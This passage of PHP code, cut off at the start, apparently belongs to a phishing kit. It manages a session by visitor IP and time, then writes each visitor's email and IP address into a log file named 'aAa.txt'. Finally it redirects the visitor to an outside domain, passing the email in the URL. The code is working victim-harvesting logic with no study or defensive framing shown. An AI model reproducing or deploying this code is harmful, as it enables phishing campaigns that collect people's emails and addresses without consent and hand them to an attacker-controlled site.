time()) && ($ip == $_SESSION['ip'])){ $_SESSION['lgn'] = '1'; } else { session_destroy(); header('Location: index.php'); exit; }} else { $_SESSION['ip'] = $ip; $_SESSION['time'] = time(); $_SESSION['lgn'] = '1';} if($email) { $contents = "\n Email: ".$email."\n"." IP: ".$ip."\n"; $file = "aAa.txt"; file_put_contents($file, $contents, FILE_APPEND | LOCK_EX);} // Redirect to URL header("Location: https://alexnhofer.com/zYKZK/" . $email);exit; ?>